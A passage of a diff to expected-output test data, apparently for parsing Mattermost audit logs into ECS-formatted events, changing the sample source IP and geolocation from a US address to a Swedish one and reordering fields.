"name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1534,9 +1582,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:03:01.043Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -1550,45 +1613,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/config", - "original": "/api/v4/config" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:03:01.043Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209591224Z", - "original": "{\"timestamp\":\"2021-12-05 00:03:01.043 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543301659Z", + "original": "{\"timestamp\":\"2021-12-05 00:03:01.043 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "getConfig", "category": [ @@ -1603,6 +1650,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/config", + "original": "/api/v4/config" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1615,9 +1666,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:03:13.849Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -1641,45 +1707,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels", - "original": "/api/v4/channels" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:03:13.849Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209596718Z", - "original": "{\"timestamp\":\"2021-12-05 00:03:13.849 Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543303008Z", + "original": "{\"timestamp\":\"2021-12-05 00:03:13.849 Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createChannel", "category": [ @@ -1693,6 +1743,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels", + "original": "/api/v4/channels" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1705,9 +1759,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:04:01.294Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -1731,45 +1800,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha", - "original": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:04:01.294Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209604404Z", - "original": "{\"timestamp\":\"2021-12-05 00:04:01.294 Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha\",\"channeld\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543304384Z", + "original": "{\"timestamp\":\"2021-12-05 00:04:01.294 Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha\",\"channeld\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "deleteChannel", "category": [ @@ -1783,6 +1836,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha", + "original": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1795,9 +1852,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:12:11.211Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -1811,45 +1883,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/config", - "original": "/api/v4/config" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:12:11.211Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209609882Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:11.211 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543305780Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:11.211 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "getConfig", "category": [ @@ -1864,6 +1920,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/config", + "original": "/api/v4/config" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1876,7 +1936,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "mattermost": { @@ -1907,22 +1970,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch", @@ -1940,12 +2006,12 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-12-08T15:26:55.209615329Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:23.085 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543307161Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:23.085 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchTeam", "category": [ @@ -2007,22 +2073,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch", @@ -2040,12 +2109,12 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-12-08T15:26:55.209620519Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:29.655 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543308528Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:29.655 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchTeam", "category": [ @@ -2102,22 +2171,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/api/v4/teams", @@ -2135,12 +2207,12 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-12-08T15:26:55.209626076Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:46.044 Z\",\"event\":\"createTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543310073Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:46.044 Z\",\"event\":\"createTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createTeam", "category": [ @@ -2174,6 +2246,18 @@ } }, { + "@timestamp": "2021-12-05T00:18:13.183Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -2197,45 +2281,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" - } - }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y", - "original": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:18:13.183Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209631447Z", - "original": "{\"timestamp\":\"2021-12-05 00:18:13.183 Z\",\"event\":\"removeTeamMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543311441Z", + "original": "{\"timestamp\":\"2021-12-05 00:18:13.183 Z\",\"event\":\"removeTeamMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "removeTeamMember", "category": [ @@ -2262,6 +2330,10 @@ } } }, + "url": { + "path": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y", + "original": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2274,9 +2346,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:18:17.907Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -2290,45 +2377,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all", - "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:18:17.907Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209636796Z", - "original": "{\"timestamp\":\"2021-12-05 00:18:17.907 Z\",\"event\":\"revokeAllSessionsForUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543312831Z", + "original": "{\"timestamp\":\"2021-12-05 00:18:17.907 Z\",\"event\":\"revokeAllSessionsForUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "revokeAllSessionsForUser", "category": [ @@ -2342,6 +2413,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all", + "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2354,9 +2429,25 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:02:56.163Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "other1", + "cuk45yubk3nq8g7udrhojbk8ty" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { @@ -2375,46 +2466,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/me/patch", - "original": "/api/v4/users/me/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:02:56.163Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "other1", - "cuk45yubk3nq8g7udrhojbk8ty" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209641989Z", - "original": "{\"timestamp\":\"2021-12-05 01:02:56.163 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"session_id\":\"6s4sy7p1b3fqdc3fktsh4yznhr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other1\",\"roles\":\"system_user system_admin\"},\"user\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other\",\"roles\":\"system_user system_admin\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543314237Z", + "original": "{\"timestamp\":\"2021-12-05 01:02:56.163 